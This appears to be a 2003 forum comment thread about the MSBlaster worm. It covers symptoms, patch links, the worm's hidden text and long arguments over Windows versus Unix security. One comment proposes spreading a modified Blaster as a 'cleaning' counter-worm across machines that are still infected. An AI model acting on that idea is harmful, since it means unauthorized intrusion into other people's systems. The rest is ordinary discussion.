Some people have associated this with the install of Service Pack 4, but it appears to be coincidental and not related to the SP4 install. However, SP4 does seem to have it's own user-reported set of issues unrelated to this worm, as discussed here:
http://www.w2knews.com/anecdotes.htm
Windows ME/98/95: Unaffected by this worm.
Windows Update: Windows Update is running incredibly slowly.
You may or may not be able to get in to update your system. This is due to the fact that millions of people are all hitting the service at once trying to get the patch to stop this worm. If you keep trying, you will eventually get in, but it may take a number of tries and 5 minutes or so per try. Additionally, you may get an HTTP 1.1 Server Too Busy error message even after you are in. Just keep clicking on the "Review and Install Updates" link on the left side pane and it will eventually let you in. When it does make a connection, the window or system may appear to hang for up to a minute or two. Just wait it out and it will eventually wake back up with the Blindly-Accept-Our-New-License-Terms window. Read the license terms thoroughl and print out a copy for your files (sorry, couldn't resist) and then OK" and the updates will then download (slowly) the needed files and install them.
To make matters worse, the worm will start a Denial of Service attack against the Windows Update site on Saturday Aug 16, so if you think it's bad now, you aint seen nothing yet.
Worm Trivia: The worm contains the following text, which is not displayed on the screen:
I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? Stop making money and fix your software!!
If you experience either of the above symptoms on your PC's, you need to apply the appropriate patch from here immediately:
Windows XP Security Patch:
http://download.microsoft.com/download/9/8/b/98bcf ad8-afbc-458f-aaee-b7a52a983f01/WindowsXP-KB823980 -x86-ENU.exe
Windows 2000 Security Patch:
http://download.microsoft.com/download/0/1/f/01fdd 40f-efc5-433d-8ad2-b4b9d42049d5/Windows2000-KB8239 80-x86-ENU.exe
Windows NT 4.0 Security Patch:
http://download.microsoft.com/download/6/5/1/651c3 333-4892-431f-ae93-bf8718d29e1a/Q823980i.EXE
Wind ows NT 4.0 Terminal Server Edition Security Patch:
http://download.microsoft.com/download/4/6/c/46c9c 414-19ea-4268-a430-53722188d489/Q823980i.EXE
Wind ows Server 2003 Security Patch:
http://download.microsoft.com/download/8/f/2/8f211 31d-9df3-4530-802a-2780629390b9/WindowsServer2003- KB823980-x86-ENU.exe
Then, run this program to scan your system for any remaining parts of the worm.
Removal Tool:
http://securityresponse.symantec.com/avcenter/Fix
Some day, you will learn that you cannot succeed with Windows. Until then, may God have mercy on your soul.
The MVA (Motor Vehicle Administration) was out the other day. So now, I not only have to wait for hours and hours, I turn in the forms and they tell me to come back the next day to actually pick up the license.
I feel so alive...
"Thirdly, you've just annoyed people who have access to these different systems as they now have to change their password in 3 (or more?) different places."
Exactly. Admins who are lazy will sacrifice security for simplicity.
If you've got the same userpass for everything someone only needs to figure out one userpass to get in everywhere.
If you force your users to have different logins for every app and keep all your app accounts seperate of the OS then if someone gets one userpass the amount of damage they can do is minimized. If someone get my SMTP password, worst they can do is check my e-mail.
In your setup if someone gets your SMTP password they can check your e-mail, mess with files and even possibly escelate permissions on the OS and do some real damage.
Ben
Work Safe Porn
We're not speculating here. This has been done before. Years ago, there was a MS-DOS virus which messed with dBase database files, which were common at the time. IIRC it changed some random bytes in the file.
Now the evil part was that the virus hid these modifications from the rest of the system. The users didn't notice. Only when they erased the virus (or moved the database to another, clean computer), they found out that their data was corrupted.
Luckily, this virus didn't spread far AFAIK. But a good infection routine and the payload can be combined...
I heard recently from my 17 year old friend of mine here in Slidell, LA (Outside New Orleans) that the local DMV was "taken out" by the recent Msblaster worm. It took a few hours for him to get his new drivers License.
--Bahamlabs
After reading some of the messages, a question came to me. If we were living in a world where the majority of computers were running upon MacOS, it isnt predictable that the majority of viruses will spread on this kind of environment instead of Windows? My question is how much we can attack the lack of effort from Microsoft to increase security, and which part of the burden we should blame on a natural exposure of the most used platform to this kind of motivation?
Myself and other admins have seen patched systems get infected anyway. The patches MS put out for this didn't work.
There are newer patches now, perhaps they will work.
A former dot-bomb refugee from an all-Linux/Unix shop, I've now the (mis)fortune to have worked the last few years as an interface programmer at a 150-bed community hospital. Unfortunately the (mis)managers have seen fit to stock their computer room over the years with now around 60 servers running some form of Windows, and all on a LAN with Internet access. Yesterday the hospital's critical pharmacy and electronic medical records systems where disabled for several hours due to the recent exploit to Windows systems.
You know? I've wondered why Firewalls weren't built into the NIC. A Firewall really isn't a complicated beast, and hardware is cheap.
MS has made it so that IE is REQUIRED to access the Windows Update site. So, if you've managed to remove IE from your computer, you cannot update your PC to shield against Blaster and your PC will attack MS's site on the 16th. Except for some Internet lag though, it's not your fault because MS decided not to make the patch available to people that exclusively use other browsers. So... Those of us that don't use IE have been invited to attack MS's site by MS!!! How cool is that!
One of these comments in one of the blaster articles had a url to Blaster source code. Anyone want to de-fang it, and throw on an anti-Blaster app? Chances are the stuff that's been hit isn't secured against it yet, so simply hitting it with a modified Blaster should get rid of it, right?
For our windows terminal servers and a few workstations but our Novell cluster is chugging right along. AAAAHHHH Novell the best windows administration tool on the planet, once you get the client installed :)
And they noticed this why?
Our call centre has had 200-300 people in queue for the past 3 days about this (MSN Tech Support, I know, I know.. haha) Microsoft would not even let us call this a virii for the first 2 days even though people knew it was, all that we are allowed to do is build them a manual connection enable ICF and get them to download the patch, then refer them to thier OEM or virus scanner maker. I've mentioned to them that we should be turning of the system restore function after we install the patch, then turn it back on so it erases the virus infected backups. (I've noticed the virus scanners dont pick it out of the system restore files.) But suppposedly clicking this checkbox is out of our 'Support Guidelines'. We are not allowed to remove the virus even though its VERY simple.
Do these agencies really have such little protection against attack? This article makes it sound like Stanley Jobson dropped a hydra in a trapdoor after using a worm to break through the firewall.
If you expect an OS to be released and have absolutely no vulnerabilities from day one, then I would love to have some of what you are smoking.
Even Linux has its problems with security flaws. The only problem with Linux is you have to know a hell of a lot more about the system and be willing to invest more time in protecting it.
What did I have to do to protect my WinXP Pro machine? Visit Windows update every so often, usually once a week, download the updates and have a firewall. Things everyone using Windows should do, and if you exclude step one, things everyone should do.
The constant witching about MS is getting to be annoying, no one is perfect, but at least it is easy and painless to install updates if you install them when they are released, not when all the other idiots that waited until a virus is spreading are installing them.
I tried Linux, I have it dual booting on my machine, I don't like it. Sure if it had come out back when I was a kid I might have a different opinion of it, if I had more time to spend learning about it. But it didn't and I don't. No one is paying me to use it and so far no one has required that I know it. So I'm not wasting my time.
Unfair comparison. In your example, the gun is doing exactly what it was designed to do: shoot. The Microsoft product isn't performing as the users have reason to expect it to. And it's because of shoddy workmanship on the part of Microsoft. A better gun example would have be the M16 during Vietnam when it was malfunctioning all over the place. And yes, it was the fault of Colt and the Army for insufficient testing of the product. People died. In either case, shoddy design & manufacture should be penalized.
Just hit the support.microsoft.com site and start counting.
For me, I'm content with the approximation "many", or possibly "too many", or "way too fsking many"
Other OS's that I'm familiar with have many vulnerabilities in programs that run on them, but relatively few in the OS itself. With the various flavors of Windows, there isn't a significant difference. When IIS is installed by default, an IIS flaw is an OS flaw. When Apache is not installed by default, its flaws should not be counted with those of the OS.
Don't count every buffer overflow in every chat client on source forge. DO count every flaw in IE and outlook express, because getting rid of them is impractical. You could probably throw in media player as well.
I agree that you have to stay on top of the updates, but in my environment the many linux and OpenBSD boxes are much less trouble than the few windows boxes - both proportionally and absolutely.
So far as your assertions about "statically linked" virii and the impracticality of attacking *nux, I'll remind you of the redhat attack of a couple years back. Took out quite a number of systems as I recall - across a wide variety of revisions and, because RH is the "base" for so many others, a variety of distributions were affected (including my own, which was running Mandrake 6 at the time).
No, the fault still lies greatly in the hands of Microsoft. They build a system, market it as drool-proof, drooling idiots all over the world buy it, and those drooling idiots get burned and are still so stupid that they don't realize they were LIED TO IN THE FIRST PLACE!
So what? Other systems don't have security holes? Those holes aren't eventually exposed, and patches released? Try subscribing to bugtraq or security focus or any of the dozens of other similar lists for a while and see how many holes in Linux, irix and every other *nix come out. As many as the MSFT products? no.. ZERO.. hardly..
Patches are a fact of life.. IF you don't want to patch your systems, don't connect them. It's really just that simple.
They build a system, market it as drool-proof, drooling idiots all over the world buy it,
The 2 examples stated were city governments. They have large IT organizations that are perfectly capable of making informed decisions. They also have staff who are capable of rolling hotfixes and failed to do so. The time and cost to do so are very nearly zero and yet they chose to ignore the threat. They need to accept the responsibilty.
If privacy had a tombstone it would read "We did it for your own good" . -- John Twelve Hawks
Your right about the gun. Point well taken. But what about my other example. What if one night you forget to lock your doors and someone breaks into you house. Is it your fault? No. Breaking and entering is breaking and entering whether they enter through an unlocked door or through a window they just broke. Microsoft may or may NOT be doing all they can to mitigate exposure to such malicious attacks. But, do people really think that Microsoft is intentionally releasing a product that they believe to be flawed? They set their own time frames/release dates due to the lack of competition. It's not like they try to beat the next version of Redhat to market. The bottom line is that the "bad guys" are always a little smarter. The dark side of the force is too strong.
-- Probability does not dismiss possibility --
Other systems don't have security holes?
It isn't about doing a hole-for-hole comparison and seeing which pile is higher. It's a matter of comparing a vendor's claims with their delivered goods. Few vendors rank with Microsoft when measured by cunning and deceitfulness.
They have large IT organizations that are perfectly capable of making informed decisions.
Are they? Government bureaucracies are not often highly regarded for their efficiency or sharp decision making abilities. For example, our DMV "upgraded" recently from a modest mainframe-backed system to a new-fangled system with Windows clients. Going to the DMV now takes longer and is much worse than ever before. Microsoft wants people to believe their techology will make everyones problems disappear as if by magic, when, in reality, they are straight-faced liars selling snake oil.
Healthcare article at Kuro5hin
Troll, how is something like redhat's up2date harder that windows update??? And what the hell did I say about turning shit on by default? Why don't they turn on Windows firewall by default? Why don't they turn off high-vulnerability services by default? What the last Linux worm that fucked things up on the scale of a MS worm?
If you're going to troll, put some effort into it. That drivel you spewed was just plain sad.
If I make a bullet-proof windshield for you that doesn't protect against bullets, it would be my fault that the thing doesn't stop them. If your armored truck gets robbed because of this, I would be partially responsible for your losses, second only to the people that robbed it.
If Microsoft would just admit that their software is insecure, we would get back to calling it an insecure piece of crap. When they win national defense software contracts and claim to be secure, I have a serious problem with them.
I use OpenBSD on anything life-or-death and Linux on everything else. I have yet to see any of those systems get infected with a virus or invaded by crackers. The most I've been hurt from a virus was the downtime when my ISP caught Slammer.
Is installing a patch in winshit still as difficult as opening up their browser and going to the update site? Many of us connect to our servers from crummy connections that can't handle remote graphical terminals with Windows. If M$ has finally made an equivalent to "apt-get update && apt-get upgrade" since I discovered the glory of Posix-Compliance, then good job for them. If not, then they can bite my shiny metal ^D
You can't judge a book by the way it wears its hair.
Well, I say screw those who run Windows. You included.
Although "everything off" is good, "everything uninstalled" is better.
One of the things I like about my little Gentoo box is I don't even have the telnet and ftp daemons on disk, let alone open to hacker attack.
GCHQ Quantum Insert installed. If only our tongues were made of glass, how much more careful we would be when we speak
How'd this wind up as a comment for the article on a Windows virus? The parent comment clearly belongs to today's article about growing synthetic diamonds.
Broken slashcode?
90% of the desktops are Windows-Based.
Most Virus writers can purchase a PC and tools to develop a virus for under $200. Add maybe 3 years or so of experience with coding and you have probably code any virus you want to when dealing with Microsoft.
This is why we hear about Worms in the news that are Windows-based.
One of the downfalls of Linux is that it puts a UNIX like environment in the hands of Joe Blow Virus Writer. Also, it puts Linux in the hands of Robbie the Retarded Systems Admin. Similar to What NT has done in the past.
And yes, the Ramen Worm was pretty impressive, had we all been running Redhat 6.2, the news might have mentioned it
Place something witty here
Wierd.. yeah I didn't post to that article, I posted to the synthetic diamond article... I was wondering why ppl were saying OffTopic..
- Voxel
Modesty is one of life's greatest attributes
I got to spend most of the day playing with this. Turns out this is msblast. The '60 seconds to reboot' thing only affects XP, not 2k. The reason we were getting these strange symptoms and nothing for the virus scanners to catch is that this is a failed msblast. The buffer overflow hit, but failed to download the payload through tftp. (Yes! Finally, an advantage to having your WAN links running at 750% of capacity - virus-induced TFTP transfers fail!) We found that installing MS03-026 on the system and rebooting cleared the weird behavior, and for one or two that did actually manage to download the actual virus file, Trend's newer virus defs find it and kill it mercilessly (even removing the registry entry.)(Trend pattern file v606, released yesterday, supposedly found msblast, but we didn't see any actual detections until v608 came out today. Could have just been that none of the machines had downloaded it yet yesterday...)
Hope this helps the people who had similar symptoms.
The MVA doesn't need a virus to slow it down. It crawls just fine on its own.
Shut up brain or I'll stab you with a Q-Tip. - Homer Simpson
How do you come up with the "formula" that you should see 1 virus for other platforms for every 20 developed for Windows?
If Windows has a 90% marketshare, that doesn't mean the alternatives will automatically have some directly relative percentage of virii targeted at them.
It's more complex than that. I propose that Microsoft, being as large as they are (and supposedly, a monopoly too, right?), have made far more enemies than the developers of alternative OS products. Look how many virii contain anti-MS messages inside them! They're purposely trying to punch holes in the MS products because they're the "standard".
It isn't as simple as a virus writer saying "Hmm... what does my workplace use? Oh, we run Linux? Ok then, a Linux virus it will be!"
Is that people still think the issue is one of the following problems:
....... WHICH IS ADMINISTRATOR.
1) script kiddies
2) lack of a good virus scanner
3) bugs or security holes
4) poor software
Ever notice that all of the above problems won't ever go away? no mater how hard you patch your box you will never catch up.
And as one wise poster said, "i don't patch too soon because the patch often introduces more problems than it fixes".
The reason that unix and mainframe environments are more secure than windows pc's is for one reason and one reason only......
Good design.
When i install postgress i install it under the postegress user. When i install Oracle i install it under the Oracle user. When i browse the web i run the browser as myself. When i read email i read email as myself.
NONE of the above users have root priviledges. Yet when i run the above software on my windows server, more often than not it does have full admin rights and is/ or is equivilent to the admin user.
EVEN if i attempt good security measures i can't get around the fact that so many ms products want to run as root, or use services that run as root, or depend on infrastructures that run as root, etc etc etc.
So no matter how quickly you patch, human error and bugs in software will undoubtedly introduce new security problems.
In a multi user secured environment each user space is protected from every other user space by the inherant security model.
In a windows environment, most processes are all the same user, or for certain parts of their operations become the same user, or have the same user
And you can never stop the adminstrator from doing whatever it wants to do to your sysem because it is God.
and that is why virus manufacturers will never go out of business no matter how good ms-update becomes.
jech.
Besides your made-up figures, none of that made much sense. And one Linux worm? Wow.
Ok, I blame John Brunner for inventing worms, in Shockwave Rider.
My other car is a 1984 Nark Avenger.
Like hell it doesn't! Every part of my systems down to the little rubber feet on the bottom are detailed down to DLL level through version-controlled documents that are wet-ink signed on completion. We're considered validated by the FDA.
There's nothing wrong with using IE and IIS (well, maybe not IIS!) in a medical sector, but you take precautions. Lock it down, firewall it off and certainly don't expose it to the internet.
I *certainly* wouldn't let anyone using a PC that I don't admin and lockdown access the systems I admin. If anyone wants to sit at home in the garden looking at my systems using their insecure wifi connection they can't. Simple as that. It's just good practice. GxP, in fact.
My job is extending a buisness not patching it.
How can you gob off such crap. Really MOST businesess are not here to create a world for IT wannbees they are here for business!
Whilst you think we have the time to joy over the next elite computer hack perhaps we want to make things work.
And YES i have forgotten more about computers than you will ever know
A snippet of M$ propaganda from their website regarding Win2K3:
Security. Businesses have extended the traditional local area network (LAN) by combining intranets, extranets, and Internet sites. As a result, increased system security is now more critical than ever before. As part of the Microsoft commitment to reliable, secure, and dependable computing, the company has intensely reviewed the Windows Server 2003 family to identify possible fail points and exploitable weaknesses.
Good points, but my overall point is that there would be more around than what there currently is.
As for developers, I would argue that Microsoft has the lions share of the developer community and most of those seem to love Microsoft. So it doesn't seem out of reason to assume that some of them would try and hack other systems.
I don't agree that most of these contain anti-Microsoft messages either. Most seem to contain crap. The core issue is that Microsoft has ignored security at the cost of features while most of the competition hasn't and for the longest time I.T. consulting companies have ignored this as well. Now they should be held particaly responsible.
Lets compare Applets to ActiveX. Java Applets were far more prevelant than ActiveX controls, but Sun took security seriously and Microsoft didn't. ActiveX is an abomination at best and Applets, although a pain are still usefull.
The more I learn about science, the more my faith in God increases.